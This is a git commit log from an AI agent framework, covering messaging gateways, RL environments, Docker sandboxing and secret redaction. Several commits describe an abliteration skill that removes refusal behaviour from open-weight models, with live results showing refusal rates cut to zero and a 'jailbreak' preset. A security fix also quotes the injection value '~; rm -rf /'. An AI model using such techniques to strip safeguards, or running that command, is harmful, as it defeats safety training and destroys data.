Authored by JackTheGit. Simple typo fix: publically → publicly in axolotl reference docs.
2026-03-09 20:55:37 -07:00
teknium1
b9d55d5719 feat: add pokemon-player skill with battle-tested gameplay tips
Comprehensive skill for playing Pokemon Red/Blue via the pokemon-agent
package (NousResearch/pokemon-agent). Includes:

- Full startup procedure (uv venv, server, localhost.run dashboard tunnel)
- Save/load lifecycle and naming conventions
- Gameplay loop with emphasis on frequent vision checks
- Hard-learned navigation tips:
  - Use vision every 2-4 steps (RAM state is blind to obstacles)
  - Wait 2-3 seconds after door/stair warps for map transitions
  - Sidestep after exiting buildings to avoid re-entering
  - Hold B to speed Gen 1's slow text scrolling
  - Ledges are one-way — use vision to find gaps
- Battle strategy, type chart, Gen 1 quirks
- Memory conventions with PKM: prefix
- Progression milestones through all 8 gyms + Elite Four
2026-03-09 20:29:38 -07:00
teknium1
ab7dc22984 Merge: WebResearchEnv evaluate() with full agent loop + tools 2026-03-09 19:53:36 -07:00
teknium1
bf8350ac18 fix: evaluate() uses full agent loop with tools, not single-turn
The evaluate method was doing single-turn chat_completion (no tools),
which defeats the purpose of an agentic research benchmark. Fixed to
run the full HermesAgentLoop with web_search/web_extract tools.

Results comparison (Claude Sonnet 4.5, FRAMES benchmark):
  Without tools (broken): 0.56 mean correctness
  With agent loop + tools: 1.00 mean correctness, 0.994 reward

New eval metrics: mean_correctness, mean_reward, mean_tool_calls,
tool_usage_rate — all logged via evaluate_log() in lighteval format.
2026-03-09 19:53:28 -07:00
teknium1
a5c6348d41 Merge: WebResearchEnv compute_reward fix (verified with live test) 2026-03-09 19:29:19 -07:00
teknium1
320f881e0b fix: WebResearchEnv compute_reward extracts from AgentResult.messages
AgentResult has .messages (list of dicts), not .final_response or
.tool_calls. Fixed compute_reward to extract the final response
and tool names from the message history.

Verified with live process mode test:
  - Agent used 7 tool calls (web_search, web_extract)
  - Produced a 1106-char researched response about Winter Olympics
  - Reward: 0.384 (partial correctness via LLM judge)
  - JSONL output contains valid tokens, masks, scores, messages
2026-03-09 19:29:12 -07:00
Brooklyn Nicholson
0d96f1991c test: parallelize test suite with pytest-xdist
~2min sequential runs were painful. Added pytest-xdist and -n auto
to run across all available cores. Tests already isolate state via
tmp_path fixtures so no changes needed to test code.

Local: 2677 passed in ~30s. CI gets 4 vCPUs on ubuntu-latest.
2026-03-09 20:47:34 -05:00
teknium1
172a38c344 fix: Docker persistent bind mounts fail with Permission denied
cap-drop ALL removes DAC_OVERRIDE, which root needs to write to
bind-mounted directories owned by the host user (uid 1000). This
broke persistent Docker sandboxes — the container couldn't write
to /workspace or /root.

Add back the minimum capabilities needed:
- DAC_OVERRIDE: root can write to bind-mounted dirs owned by host user
- CHOWN: package managers (pip, npm, apt) need to set file ownership
- FOWNER: needed for operations on files owned by other users

Still drops all other capabilities (NET_RAW, SYS_ADMIN, etc.) and
keeps no-new-privileges. Security boundary is the container itself.

Verified end-to-end: create files → destroy container → new container
with same task_id → files persist on host and are accessible in the
new container.
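For reference, the equivalent docker run flags (volume path illustrative):

  docker run --cap-drop ALL \
      --cap-add DAC_OVERRIDE --cap-add CHOWN --cap-add FOWNER \
      --security-opt no-new-privileges \
      -v /home/user/workspace:/workspace ...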
2026-03-09 17:52:33 -07:00
teknium1
8bc0d4f77d Merge: WebResearchEnv Atropos standards compliance 2026-03-09 17:45:57 -07:00
teknium1
8eabdefa8a fix: bring WebResearchEnv up to Atropos environment standards
The environment was merged missing several standard components.
Updated to match the patterns established by 82 Atropos environments
and our own HermesAgentBaseEnv contract.

Added:
- WebResearchEnvConfig — custom Pydantic config with reward weights,
  efficiency thresholds, eval settings, dataset config (all tunable
  via CLI/YAML without code changes)
- config_init() classmethod — default server config (OpenRouter +
  Claude) so the env works out of the box
- wandb_log() override — logs reward breakdown metrics (correctness,
  tool_usage, efficiency, diversity, correct_rate, tool_usage_rate)
  with proper buffer management and super() call
- evaluate() — uses server.chat_completion instead of broken stub
  _run_agent_on_item(). Logs via evaluate_log() for lighteval-
  compatible output.

Fixed:
- Removed broken _run_agent_on_item() stub that returned empty results
- evaluate() now uses server.chat_completion (same pattern as
  TerminalTestEnv) for actual model evaluation
- compute_reward reads tool calls from AgentResult properly
- LLM judge uses self.server.chat_completion instead of ctx

Reward config is now tunable without code changes:
  --env.correctness_weight 0.6
  --env.tool_usage_weight 0.2
  --env.efficiency_weight 0.2
  --env.diversity_bonus 0.1
  --env.efficient_max_calls 5
2026-03-09 17:45:50 -07:00
teknium1
f658af45c2 Merge PR #446: fix(cli): use correct visibility filter string in codex API model fetch
Authored by PercyDikec. Fixes #445.
Changes 'hide' to 'hidden' in _fetch_models_from_api to match
_read_cache_models and the actual API response format.
2026-03-09 17:42:39 -07:00
teknium1
5212644861 fix(security): prevent shell injection in tilde-username path expansion
Validate that the username portion of ~username paths contains only
valid characters (alphanumeric, dot, hyphen, underscore) before passing
to shell echo for expansion. Previously, paths like '~; rm -rf /'
would be passed unquoted to self._exec(f'echo {path}'), allowing
arbitrary command execution.

The approach validates the username rather than using shlex.quote(),
which would prevent tilde expansion from working at all since
echo '~user' outputs the literal string instead of expanding it.

Added tests for injection blocking and valid ~username/path expansion.

Credit to @alireza78a for reporting (PR #442, issue #442).
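Sketch of the validation (character set as above; self._exec per this commit):

  import re

  m = re.match(r"^~([A-Za-z0-9._-]+)(/.*)?$", path)
  if not m:
      raise ValueError(f"refusing to expand untrusted path: {path!r}")
  home = self._exec(f"echo ~{m.group(1)}").strip()
  expanded = home + (m.group(2) or "")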
2026-03-09 17:33:19 -07:00
teknium1
1151f84351 Merge PR #434: feat: add WebResearchEnv RL environment for multi-step web research
Authored by jackx707. Adds web_research_env.py (Atropos RL environment for
multi-step web research using FRAMES benchmark) and batch generation config.
2026-03-09 17:24:20 -07:00
teknium1
9abd6bf342 fix: gateway missing docker_volumes config bridge + list serialization bug
The gateway's config.yaml → env var bridge was missing docker_volumes,
so Docker volume mounts configured in config.yaml were ignored for
gateway sessions (Telegram, Discord, etc.) while working in CLI.

Also fixes list serialization: str() produces Python repr with single
quotes which json.loads() in terminal_tool.py can't parse. Now uses
json.dumps() for list values.

Based on PR #431 by @manuelschipper (applied manually due to stale branch).
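The failure mode in miniature:

  import json
  vols = ["/host/data:/data"]
  str(vols)         # "['/host/data:/data']" - single quotes, json.loads() rejects it
  json.dumps(vols)  # '["/host/data:/data"]' - valid JSON, round-trips cleanly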
2026-03-09 17:24:00 -07:00
Teknium
d2c7ef6b41 Merge pull request #792 from NousResearch/hermes/hermes-d2f5523a
Merge PR #428: Improve type hints and error diagnostics in vision_tools + add 42 tests
2026-03-09 17:21:44 -07:00
0xbyt4
4e3a8a0637 fix: handle empty choices in MCP sampling callback
SamplingHandler.__call__ accessed response.choices[0] without checking
if the list was non-empty. LLM APIs can return empty choices on content
filtering, provider errors, or rate limits, causing an unhandled
IndexError that propagates to the MCP SDK and may crash the connection.

Add a defensive guard that returns a proper ErrorData when choices is
empty, None, or missing. Includes three test cases covering all
variants.
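The guard, roughly (ErrorData and INTERNAL_ERROR from mcp.types; surrounding
code simplified):

  from mcp.types import INTERNAL_ERROR, ErrorData

  choices = getattr(response, "choices", None)
  if not choices:
      return ErrorData(code=INTERNAL_ERROR,
                       message="LLM response contained no choices")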
2026-03-10 02:24:53 +03:00
teknium1
a34102049b Merge: vision auto-detection fallback to local endpoints 2026-03-09 15:36:27 -07:00
teknium1
ef5d811aba fix: vision auto-detection now falls back to custom/local endpoints
Vision auto-mode previously only tried OpenRouter, Nous, and Codex
for multimodal — deliberately skipping custom endpoints with the
assumption they 'may not handle vision input.' This caused silent
failures for users running local multimodal models (Qwen-VL, LLaVA,
Pixtral, etc.) without any cloud API keys.

Now custom endpoints are tried as a last resort in auto mode. If the
model doesn't support vision, the API call fails gracefully — but
users with local vision models no longer need to manually set
auxiliary.vision.provider: main in config.yaml.

Reported by @Spadav and @kotyKD.
2026-03-09 15:36:19 -07:00
teknium1
2d44ed1c5b test: add comprehensive tests for vision_tools (42 tests)
Covers PR #428 changes and existing vision_tools functionality:
- _validate_image_url: 20 tests for urlparse-based validation
- _determine_mime_type: 6 tests for MIME type detection
- _image_to_base64_data_url: 3 tests for base64 conversion
- _handle_vision_analyze: 5 tests for type hints, prompt building,
  AUXILIARY_VISION_MODEL env var override
- Error logging exc_info: 3 async tests verifying stack traces are
  logged on download failure, analysis error, and cleanup error
- check_vision_requirements & get_debug_session_info: 2 basic tests
- Registry integration: 3 tests for tool registration
2026-03-09 15:32:02 -07:00
teknium1
fa2e72ae9c docs: document docker_volumes config for shared host directories
The Docker backend already supports user-configured volume mounts via
docker_volumes, but it was undocumented — missing from DEFAULT_CONFIG,
cli.py defaults, and configuration docs.

Changes:
- hermes_cli/config.py: Add docker_volumes to DEFAULT_CONFIG with
  inline documentation and examples
- cli.py: Add docker_volumes to load_cli_config defaults
- configuration.md: Full Docker Volume Mounts section with YAML
  examples, use cases (providing files, receiving outputs, shared
  workspaces), and env var alternative
2026-03-09 15:29:34 -07:00
teknium1
5bfc4ed53b Merge PR #428: Improve type hints and error diagnostics in vision_tools
Authored by aydnOktay. Improves URL validation with urlparse, adds exc_info
to error logs for full stack traces, and tightens type hints.

Resolved merge conflict in _handle_vision_analyze: kept PR's string formatting
with our AUXILIARY_VISION_MODEL env var logic.
2026-03-09 15:27:54 -07:00
teknium1
520aec20e0 fix: add mcp to dev dependencies for test suite
MCP tests import from mcp.types but mcp wasn't in the dev optional
dependencies. Fresh 'pip install -e .[dev]' setups failed 3 tests.

Based on PR #427 by @teyrebaz33 (applied manually due to stale branch).
2026-03-09 15:12:54 -07:00
teknium1
64bec1d060 fix: Slack gateway setup missing event subscriptions and scopes
The 'hermes gateway setup' instructions for Slack were missing:
- The 'Subscribe to Events' step entirely (message.im, message.channels,
  app_mention, message.groups)
- Several required scopes (app_mentions:read, groups:history, users:read,
  files:write)
- Warning about bot only working in DMs without message.channels
- Step to invite the bot to channels

The 'hermes setup' flow (setup.py) and the website docs (slack.md)
already had the correct information — only gateway.py was outdated.

Reported by JordanB on Slack.
2026-03-09 14:31:19 -07:00
teknium1
ac58309dbd docs: improve Slack setup guide with channel event subscriptions and scopes
The #1 support issue with Slack is 'bot works in DMs but not channels'.
This is almost always caused by missing event subscriptions (message.channels,
message.groups) or missing OAuth scopes (channels:history, groups:history).

Changes:
- slack.md: Move channels:history and groups:history from optional to required
  scopes. Move message.channels and message.groups to required events. Add new
  'How the Bot Responds' section explaining DM vs channel behavior. Add Step 8
  for inviting bot to channels. Expand troubleshooting table with specific
  'works in DMs not channels' entry. Add quick checklist for channel debugging.
- setup.py: Expand Slack setup wizard with all required scopes, event
  subscriptions, and a warning that without message.channels/message.groups
  the bot only works in DMs. Add link to full docs. Improve Member ID
  discovery instructions.
- config.py: Update SLACK_BOT_TOKEN and SLACK_APP_TOKEN descriptions to list
  required scopes and event subscriptions inline.
2026-03-09 14:00:11 -07:00
teyrebaz33
94023e6a85 feat: conditional skill activation based on tool availability
Skills can now declare fallback_for_toolsets, fallback_for_tools,
requires_toolsets, and requires_tools in their SKILL.md frontmatter.
The system prompt builder filters skills automatically based on which
tools are available in the current session.

- Add _read_skill_conditions() to parse conditional frontmatter fields
- Add _skill_should_show() to evaluate conditions against available tools
- Update build_skills_system_prompt() to accept and apply tool availability
- Pass valid_tool_names and available toolsets from run_agent.py
- Backward compatible: skills without conditions always show; calling
  build_skills_system_prompt() with no args preserves existing behavior

Closes #539
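Frontmatter sketch (field names per this commit; values illustrative):

  ---
  name: ddg-search-fallback
  description: Search the web when no dedicated search tool is available
  fallback_for_tools: [web_search]
  requires_tools: [terminal]
  ---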
2026-03-09 23:13:39 +03:00
teknium1
5eaf4a3f32 feat: Telegram send_document and send_video for native file attachments
Implement send_document() and send_video() overrides in TelegramAdapter
so the agent can deliver files (PDFs, CSVs, docs, etc.) and videos as
native Telegram attachments instead of just printing the file path as
text.

The base adapter already routes MEDIA:<path> tags by extension — audio
goes to send_voice(), images to send_image_file(), and everything else
falls through to send_document(). But TelegramAdapter didn't override
send_document() or send_video(), so those fell back to plain text.

Now when the agent includes MEDIA:/path/to/report.pdf in its response,
users get a proper downloadable file attachment in Telegram.

Features:
- send_document: sends files via bot.send_document with display name,
  caption (truncated to 1024), and reply_to support
- send_video: sends videos via bot.send_video with inline playback
- Both fall back to base class text if the Telegram API call fails
- 10 new tests covering success, custom filename, file-not-found,
  not-connected, caption truncation, API error fallback, and reply_to

Requested by @TigerHixTang on Twitter.
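Roughly (python-telegram-bot style; error handling and names simplified):

  import os

  async def send_document(self, chat_id, path, caption=None, reply_to=None):
      try:
          with open(path, "rb") as f:
              await self.bot.send_document(
                  chat_id=chat_id,
                  document=f,
                  filename=os.path.basename(path),
                  caption=caption[:1024] if caption else None,
                  reply_to_message_id=reply_to,
              )
      except Exception:
          # fall back to the base adapter's plain-text path
          await super().send_document(chat_id, path, caption, reply_to)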
2026-03-09 13:07:10 -07:00
Teknium
a5a5d82a21 Merge pull request #784 from NousResearch/feat/slack-app-mention-and-documents
feat(slack): fix app_mention 404 + add document/video support
2026-03-09 13:04:50 -07:00
teknium1
34e8d088c2 feat(slack): fix app_mention 404 + add document/video support
- Register no-op app_mention event handler to suppress Bolt 404 errors.
  The 'message' handler already processes @mentions in channels, so
  app_mention is acknowledged without duplicate processing.

- Add send_document() for native file attachments (PDFs, CSVs, etc.)
  via files_upload_v2, matching the pattern from Telegram PR #779.

- Add send_video() for native video uploads via files_upload_v2.

- Handle incoming document attachments from users: download, cache,
  and inject text content for .txt/.md files (capped at 100KB),
  following the same pattern as the Telegram adapter.

- Add _download_slack_file_bytes() helper for raw byte downloads.

- Add 24 new tests covering all new functionality.

Fixes the unhandled app_mention events reported in gateway logs.
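The no-op handler is a one-liner in Bolt (sketch):

  @app.event("app_mention")
  async def handle_app_mention(body, logger):
      # Intentionally empty: the 'message' listener already handles
      # channel @mentions; acknowledging here just silences the 404s.
      pass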
2026-03-09 13:02:59 -07:00
memosr.eth
b78b605ba9 fix: replace print() with logger.error() in file_tools 2026-03-09 22:29:16 +03:00
teyrebaz33
c3cf88b202 feat(cli,gateway): add /personality none and custom personality support
Closes #643

Changes:
- /personality none|default|neutral — clears system prompt overlay
- Custom personalities in config.yaml support dict format with:
  name, description, system_prompt, tone, style directives
- Backwards compatible — existing string format still works
- CLI + gateway both updated
- 18 tests covering none/default/neutral, dict format, string format,
  list display, save to config
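Dict-format sketch (keys per this commit; the top-level section name and
values are illustrative):

  personalities:
    mentor:
      name: Mentor
      description: Patient, teaching-oriented replies
      system_prompt: "Explain your reasoning step by step."
      tone: warm
      style: concise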
2026-03-09 17:31:54 +03:00
0xbyt4
58b756f04c fix: clean up empty file after failed wl-paste clipboard extraction
When wl-paste produces empty output, the destination file was left
on disk as a 0-byte orphan. Now explicitly removed before returning
False.
2026-03-09 17:17:10 +03:00
0xbyt4
34f8ac2d85 fix: replace blocking time.sleep with await asyncio.sleep in WhatsApp connect
time.sleep(1) inside async def connect() blocks the entire event
loop for 1 second. Replaced with await asyncio.sleep(1) to yield
control back to the event loop while waiting for the killed port
process to release.
2026-03-09 17:16:26 +03:00
0xbyt4
1a10eb8cd9 fix: off-by-one in setup toggle selection error message
Error message said "between 1 and N+1" for N items, showing a
max value that would itself be rejected. Now correctly says
"between 1 and N".
2026-03-09 17:15:23 +03:00
luisv-1
59705b80cd Add tools summary flag to Hermes CLI
Made-with: Cursor
2026-03-09 16:50:53 +03:00
aydnOktay
46a7d6aeb2 Improve Telegram gateway error handling and logging 2026-03-09 15:58:01 +03:00
teknium1
c754135965 fix: banner wraps in narrow terminals (Kitty, small windows)
The full HERMES-AGENT ASCII logo needs ~95 columns, and the
side-by-side caduceus + tools panel needs ~80. In narrow terminals
(Kitty default, resized windows) everything wraps into visual garbage.

Fixes:
- show_banner() auto-detects terminal width and falls back to compact
  banner when < 80 columns
- build_welcome_banner() skips the ASCII logo when < 95 columns
- Compact banner now dynamically sized via _build_compact_banner()
  instead of a hardcoded 64-char box that also wrapped in narrow terminals
- Same width checks applied to /clear command's banner refresh

The up/down arrow key issue in Kitty terminal for multiline input is
a known Kitty keyboard protocol (CSI u) vs prompt_toolkit compatibility
gap — arrow keys work correctly in standard terminals and tmux. Users
can work around it by running in tmux or setting TERM=xterm-256color.
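The width check itself is standard library (thresholds per this commit):

  import shutil

  cols = shutil.get_terminal_size(fallback=(80, 24)).columns
  use_compact_banner = cols < 80  # side-by-side panels need ~80 columns
  show_ascii_logo = cols >= 95    # full HERMES-AGENT logo needs ~95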
2026-03-09 05:57:36 -07:00
teknium1
c6b75baad0 feat: find-nearby skill and Telegram location support
Adds a 'find-nearby' skill for discovering nearby places using
OpenStreetMap (Overpass + Nominatim). No API keys needed. Works with:
- Coordinates (from Telegram location pins)
- Addresses, cities, zip codes, landmarks (auto-geocoded)
- Multiple place types (restaurant, cafe, bar, pharmacy, etc.)

Returns names, distances, cuisine, hours, addresses, and Google Maps
links (pin + directions). 184-line stdlib-only script.

Also adds Telegram location message handling:
- New MessageType.LOCATION in gateway base
- Telegram adapter handles LOCATION and VENUE messages
- Injects lat/lon coordinates into conversation context
- Prompts agent to ask what the user wants nearby

Inspired by PR #422 (reimplemented with simpler script and broader
skill scope — addresses/cities/zips, not just Telegram coordinates).
2026-03-09 05:31:10 -07:00
teknium1
a7ad6f6d28 Merge: custom providers instant activation + model persistence 2026-03-09 05:08:01 -07:00
teknium1
1a2141d04d fix: custom providers activate immediately, save model name
Selecting a saved custom provider now switches instantly without
probing /models — the model name is stored in the config entry
as a complete profile (name + url + key + model).

Changes:
- custom_providers entries now include 'model' field
- Selecting a saved provider with a model just activates it
- Only probes /models if no model is saved (first-time setup)
- Menu shows saved model name: 'Local (localhost:8000) — llama-70b'
- Dedup on re-entry: still activates the model, just doesn't add
  a duplicate config entry (updates model name if changed)
2026-03-09 05:07:53 -07:00
teknium1
ff3f3169b2 Merge: auto-save custom endpoints + removal option 2026-03-09 04:58:27 -07:00
teknium1
f4580b6010 feat: auto-save custom endpoints + removal option
When a user adds a custom endpoint via 'hermes model' → 'Custom
endpoint', it now automatically saves to custom_providers in
config.yaml so it persists and appears in the provider menu on
subsequent runs. Deduplicates by base_url.

Auto-generated names based on URL:
  http://localhost:8000/v1 → 'Local (localhost:8000)'
  https://xyz.runpod.ai/v1 → 'RunPod (xyz.runpod.ai)'
  https://api.example.com/v1 → 'Api.example.com'

Also adds 'Remove a saved custom provider' option to the menu
(only shown when custom providers exist) with a selection UI
to pick which one to remove.

Users can also manually edit custom_providers in config.yaml
for full control over names and settings.
2026-03-09 04:58:20 -07:00
aydnOktay
d82fcef91b Improve Discord gateway error handling and logging 2026-03-09 14:33:21 +03:00
teknium1
7b63a787b3 Merge: named custom providers in hermes model 2026-03-09 03:45:26 -07:00
teknium1
069570d103 feat: support multiple named custom providers in hermes model
Users with multiple local servers or custom endpoints can now define
them all in config.yaml and switch between them from the model
selection menu:

  custom_providers:
    - name: 'Local Llama 70B'
      base_url: 'http://localhost:8000/v1'
      api_key: 'not-needed'
    - name: 'RunPod vLLM'
      base_url: 'https://xyz.runpod.ai/v1'
      api_key: 'rp_xxxxx'

These appear in `hermes model` provider selection alongside the
built-in providers. When selected, the endpoint's /models API is
probed to show available models in a selection menu.

Previously only a single 'Custom endpoint' option existed, requiring
manual URL entry each time you wanted to switch between local servers.

Requested by @ZiarnoBobu on Twitter.
2026-03-09 03:45:17 -07:00
teknium1
0dafdcab86 Merge: skill reorganization + sub-category support
- Sub-category support in prompt_builder.py (backwards-compatible)
- Split mlops (40 skills) into 7 logical sub-categories
- Merged 8 singleton categories into logical parents
- Fixed 2 misplaced skills (code-review, ml-paper-writing)
2026-03-09 03:40:11 -07:00
Teknium
654e16187e feat(mcp): add sampling support — server-initiated LLM requests (#753)
Add MCP sampling/createMessage capability via SamplingHandler class.

Text-only sampling + tool use in sampling with governance (rate limits,
model whitelist, token caps, tool loop limits). Per-server audit metrics.

Based on concept from PR #366 by eren-karakus0. Restructured as class-based
design with bug fixes and tests using real MCP SDK types.

50 new tests, 2600 total passing.
2026-03-09 03:37:38 -07:00
teknium1
732c66b0f3 refactor: reorganize skills into sub-categories
The skills directory was getting disorganized — mlops alone had 40
skills in a flat list, and 12 categories were singletons with just
one skill each.

Code change:
- prompt_builder.py: Support sub-categories in skill scanner.
  skills/mlops/training/axolotl/SKILL.md now shows as category
  'mlops/training' instead of just 'mlops'. Backwards-compatible
  with existing flat structure.

Split mlops (40 skills) into 7 sub-categories:
- mlops/training (12): accelerate, axolotl, flash-attention,
  grpo-rl-training, peft, pytorch-fsdp, pytorch-lightning,
  simpo, slime, torchtitan, trl-fine-tuning, unsloth
- mlops/inference (8): gguf, guidance, instructor, llama-cpp,
  obliteratus, outlines, tensorrt-llm, vllm
- mlops/models (6): audiocraft, clip, llava, segment-anything,
  stable-diffusion, whisper
- mlops/vector-databases (4): chroma, faiss, pinecone, qdrant
- mlops/evaluation (5): huggingface-tokenizers,
  lm-evaluation-harness, nemo-curator, saelens, weights-and-biases
- mlops/cloud (2): lambda-labs, modal
- mlops/research (1): dspy

Merged singleton categories:
- gifs → media (gif-search joins youtube-content)
- music-creation → media (heartmula, songsee)
- diagramming → creative (excalidraw joins ascii-art)
- ocr-and-documents → productivity
- domain → research (domain-intel)
- feeds → research (blogwatcher)
- market-data → research (polymarket)

Fixed misplaced skills:
- mlops/code-review → software-development (not ML-specific)
- mlops/ml-paper-writing → research (academic writing)

Added DESCRIPTION.md files for all new/updated categories.
2026-03-09 03:35:53 -07:00
teknium1
1f0944de21 fix: handle non-string content from OpenAI-compatible servers (#759)
Some local LLM servers (llama-server, etc.) return message.content as
a dict or list instead of a plain string. This caused AttributeError
'dict object has no attribute strip' on every API call.

Normalizes content to string immediately after receiving the response:
- dict: extracts 'text' or 'content' field, falls back to json.dumps
- list: extracts text parts (OpenAI multimodal content format)
- other: str() conversion

Applied at the single point where response.choices[0].message is read
in the main agent loop, so all downstream .strip()/.startswith()/[:100]
operations work regardless of server implementation.

Closes #759
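The normalization, approximately:

  import json

  def normalize_content(content) -> str:
      if isinstance(content, str):
          return content
      if isinstance(content, dict):
          return content.get("text") or content.get("content") or json.dumps(content)
      if isinstance(content, list):  # OpenAI multimodal content parts
          return "".join(p.get("text", "") for p in content if isinstance(p, dict))
      return str(content)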
2026-03-09 03:32:32 -07:00
0xbyt4
912efe11b5 fix(tests): add content attribute to fake result objects
_FakeReadResult and _FakeSearchResult now expose the attributes
that read_file_tool/search_tool access after the redact_sensitive_text
integration from main.
2026-03-09 13:25:52 +03:00
0xbyt4
4684aaffdc merge: resolve file_tools.py conflict with origin/main
Combine read/search loop detection with main's redact_sensitive_text
and truncation hint features. Add tracker reset to TestSearchHints
to prevent cross-test state leakage.
2026-03-09 13:21:46 +03:00
teknium1
f1a1b58319 fix: hermes setup doesn't update provider when switching to OpenRouter
When switching FROM Codex/Nous/custom TO OpenRouter via 'hermes setup',
the old provider stayed active because setup only saved the API key but
never updated config.yaml or auth.json. This caused resolve_provider()
to keep returning the old provider (e.g. openai-codex) even after the
user selected OpenRouter.

Fix: the OpenRouter path in setup now deactivates any OAuth provider
in auth.json and writes model.provider='openrouter' to config.yaml,
matching what all other provider paths already do.
2026-03-09 03:14:22 -07:00
teknium1
c21d77ca08 Merge: OBLITERATUS skill v2.0 + unified gateway compression
OBLITERATUS skill (PR #408 updated):
- 9 CLI methods, 28 analysis modules, 116 model presets
- Default method: advanced (multi-direction SVD, norm-preserving)
- Live-tested: Qwen2.5-3B 75%→0% refusal, Qwen2.5-0.5B 60%→20%
- References, templates, and real-world pitfalls included

Gateway compression fix (PR #739):
- Unified session hygiene with agent compression config
- Uses model context length × compression.threshold from config.yaml
- Removed hardcoded 100k/200-msg thresholds
2026-03-09 02:59:41 -07:00
teknium1
d6c710706f docs: add real-world testing findings to OBLITERATUS skill
Added pitfalls discovered during live abliteration testing:
- Models < 1B have fragmented refusal, respond poorly (0.5B: 60%→20%)
- Models 3B+ work much better (3B: 75%→0% with advanced defaults)
- aggressive method can backfire on small models (made it worse)
- Spectral certification RED is common even when refusal rate is 0%
- Fixed torch property: total_mem → total_memory
2026-03-09 02:52:54 -07:00
teknium1
a6d3becd6a feat: update OBLITERATUS skill to v2.0 — match current repo state
Major updates to reflect the current OBLITERATUS codebase:

- Change default recommendation from 'informed' (experimental) to
  'advanced' (reliable, well-tested multi-direction SVD)
- Add new CLI commands: tourney, recommend, strategies, report,
  aggregate, abliterate (alias)
- Add --direction-method flag (diff_means, svd, leace)
- Add strategies module (embedding/FFN ablation, head pruning,
  layer removal)
- Add evaluation module with LM Eval Harness integration
- Expand analysis modules from 15 to 28
- Add Apple Silicon (MLX) support
- Add study presets (quick, jailbreak, knowledge, etc.)
- Add --contribute, --verify-sample-size, --preset flags
- Add complete CLI command reference table
- Fix torch property name: total_mem -> total_memory (caught
  during live testing)

Tested: Successfully abliterated Qwen2.5-0.5B-Instruct using
'advanced' method — refusal rate 0.4%, coherence 1.0, model
responds without refusal to test prompts.
2026-03-09 02:39:03 -07:00
teknium1
3b67606c42 fix: custom endpoint provider shows as openrouter in gateway
Three issues caused the gateway to display 'openrouter' instead of
'Custom endpoint' when users configured a custom OAI-compatible endpoint:

1. hermes setup: custom endpoint path saved OPENAI_BASE_URL and
   OPENAI_API_KEY to .env but never wrote model.provider to config.yaml.
   All other providers (Codex, z.ai, Kimi, etc.) call
   _update_config_for_provider() which sets this — custom was the only
   path that skipped it. Now writes model.provider='custom' and
   model.base_url to config.yaml.

2. hermes model: custom endpoint set model.provider='auto' in config.yaml.
   The CLI display had a hack to detect OPENAI_BASE_URL and override to
   'custom', but the gateway didn't. Now sets model.provider='custom'
   directly.

3. gateway /model and /provider commands: defaulted to 'openrouter' and
   read config.yaml — which had no provider set. Added OPENAI_BASE_URL
   detection fallback (same pattern the CLI uses) as a defensive catch
   for existing users who set up before this fix.
2026-03-09 02:38:34 -07:00
teknium1
f8240143b6 feat(discord): add DISCORD_ALLOW_BOTS config for bot message filtering (inspired by openclaw)
Add configurable bot message filtering via DISCORD_ALLOW_BOTS env var:

- 'none' (default): Ignore all other bot messages — matches previous
  behavior where only our own bot was filtered, but now ALL bots are
  filtered by default for cleaner channels
- 'mentions': Accept bot messages only when they @mention our bot —
  useful for bot-to-bot workflows triggered by mentions
- 'all': Accept all bot messages — for setups where bots need to
  interact freely

Previously, we only ignored our own bot's messages, allowing all other
bots through. This could cause noisy loops in channels with multiple bots.

8 new tests covering all filter modes and edge cases.

Inspired by openclaw v2026.3.7 Discord allowBots: 'mentions' config.
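Filter logic, schematically (discord.py message attributes; mode read from
DISCORD_ALLOW_BOTS):

  def accept_bot_message(msg, mode: str, our_id: int) -> bool:
      if msg.author.id == our_id:
          return False  # never process our own messages
      if not msg.author.bot:
          return True   # humans always pass
      if mode == "all":
          return True
      if mode == "mentions":
          return any(u.id == our_id for u in msg.mentions)
      return False      # "none" (default)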
2026-03-09 02:20:57 -07:00
teknium1
0ce190be0d security: enforce 0600/0700 file permissions on sensitive files (inspired by openclaw)
Enforce owner-only permissions on files and directories that contain
secrets or sensitive data:

- cron/jobs.py: jobs.json (0600), cron dirs (0700), job output files (0600)
- hermes_cli/config.py: config.yaml (0600), .env (0600), ~/.hermes/* dirs (0700)
- cli.py: config.yaml via save_config_value (0600)

All chmod calls use try/except for Windows compatibility.

Includes _secure_file() and _secure_dir() helpers with graceful fallback.
8 new tests verify permissions on all file types.

Inspired by openclaw v2026.3.7 file permission enforcement.
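The helpers reduce to (sketch):

  import os

  def _secure_file(path: str) -> None:
      try:
          os.chmod(path, 0o600)  # owner read/write only
      except OSError:
          pass                   # Windows/exotic filesystems: best effort

  def _secure_dir(path: str) -> None:
      try:
          os.chmod(path, 0o700)  # owner-only access and traversal
      except OSError:
          pass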
2026-03-09 02:19:32 -07:00
teknium1
a2d0d07109 Merge PR #754: fix: stabilize system prompt across gateway turns for cache hits
Prevents unnecessary Anthropic prompt cache misses by reusing stored
system prompts for continuing sessions and stabilizing Honcho context
per session instead of per turn.
2026-03-09 02:00:14 -07:00
teknium1
aedb773f0d fix: stabilize system prompt across gateway turns for cache hits
Two changes to prevent unnecessary Anthropic prompt cache misses in the
gateway, where a fresh AIAgent is created per user message:

1. Reuse stored system prompt for continuing sessions:
   When conversation_history is non-empty, load the system prompt from
   the session DB instead of rebuilding from disk. The model already has
   updated memory in its conversation history (it wrote it!), so
   re-reading memory from disk produces a different system prompt that
   breaks the cache prefix.

2. Stabilize Honcho context per session:
   - Only prefetch Honcho context on the first turn (empty history)
   - Bake Honcho context into the cached system prompt and store to DB
   - Remove the per-turn Honcho injection from the API call loop

   This ensures the system message is identical across all turns in a
   session. Previously, re-fetching Honcho could return different context
   on each turn, changing the system message and invalidating the cache.

Both changes preserve the existing behavior for compression (which
invalidates the prompt and rebuilds from scratch) and for the CLI
(where the same AIAgent persists and the cached prompt is already
stable across turns).

Tests: 2556 passed (6 new)
2026-03-09 01:50:58 -07:00
teknium1
aaf8f2d2d2 feat: expand secret redaction patterns
Added 14 new redaction patterns, all with distinctive prefixes
that have near-zero false positive risk:

Prefix patterns:
  - AWS Access Key ID (AKIA...)
  - Stripe keys (sk_live_, sk_test_, rk_live_)
  - SendGrid (SG....)
  - HuggingFace (hf_...)
  - Replicate (r8_...)
  - npm tokens (npm_...)
  - PyPI tokens (pypi-...)
  - DigitalOcean PATs (dop_v1_, doo_v1_)
  - AgentMail (am_...)

Structural patterns:
  - Private key blocks (-----BEGIN...PRIVATE KEY-----)
  - Database connection string passwords (postgres://user:PASS@host)
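Illustrative regexes for a few of these (not the exact shipped patterns):

  import re

  REDACTION_PATTERNS = [
      re.compile(r"\bAKIA[0-9A-Z]{16}\b"),                   # AWS access key ID
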